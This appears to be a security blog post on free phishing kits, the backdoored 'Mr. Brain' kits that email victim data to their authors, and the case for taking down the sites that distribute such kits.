If you following phishing and anti-phishing at all, you probably know that the phishers use phishing kits to create phishing sites. The kits are simply an archive (zip, tar, rar) file of all of the files needed to make the phishing site.
The good and the bad thing about phishers are that most of them are not very sophisticated. In most cases the phishers are not very technical and therefore do not have the skills to create a phishing kit. Instead, they generally use free kits provided by other cyber criminals. It’s the authors of the kits that are a bit more sophisticated and who ultimately drive a large portiion of the phishing sites that we see.
Earlier this year, Netcraft blogged about certain Mr. Brain phishing kits that contained backdoors. These backdoors cause an email to be sent to the kit authors whenever a victim provides their information to a phishing site. What has not been talked about much is how ‘Mr. Brain’ has continually updated his/their phishing kits and have been distributing them one site after another. Lately, they’re being advertised in underground IRC forums:
At my last count, Mr. Brain kits have been distributed over at least 10 sites in the past year alone.
Mr. Brain is not alone in distributing free phishing kits though. Others often use free webhosting at sites like by.ru, 100webspace.net, and others to host their scams. While there are plenty of free and paid services to detect and shutdown phishing sites themselves, it seems like many of the phish kit distribution sites stay up for long periods of time. For example, the following phish kit distribution site has been up for about 18 months now:
Because so many of the phishing sites we see are the result of ‘ankle-biters’ using free phish kits, going after the phish kits distribution sites themselves can have a positive impact. Barring a significant increase in arrests, we can’t make phishing go away, but if we aggressively go after these bottom feeders will be able to see who the real bad guys are and get rid of the noise. One way to do that is stop allowing free tools like phish kits to be so easy to find.